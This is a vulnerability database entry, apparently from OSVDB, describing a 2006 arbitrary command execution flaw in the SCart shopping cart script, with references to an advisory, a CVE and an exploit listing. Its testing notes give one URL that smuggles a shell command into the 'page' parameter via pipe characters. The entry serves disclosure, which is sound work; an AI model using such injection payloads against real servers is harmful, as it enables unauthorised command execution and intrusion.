SCart scart.cgi page Variable Arbitrary Command Execution

2006-06-03T02:54:25
ID OSVDB:26594
Type osvdb
Reporter OSVDB
Modified 2006-06-03T02:54:25

Description

Manual Testing Notes

http://[target]/2.0/[client_user_name]/scart.cgi/?action=show_page&base=base2.html&page=|id|

References:

Vendor URL: http://www.scartserver.com/ Other Advisory URL: http://advisories.echo.or.id/adv/adv32-K-159-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0748.html Keyword: ECHO_ADV_3206 ISS X-Force ID: 26921 Generic Exploit URL: http://www.milw0rm.com/exploits/1876 CVE-2006-7012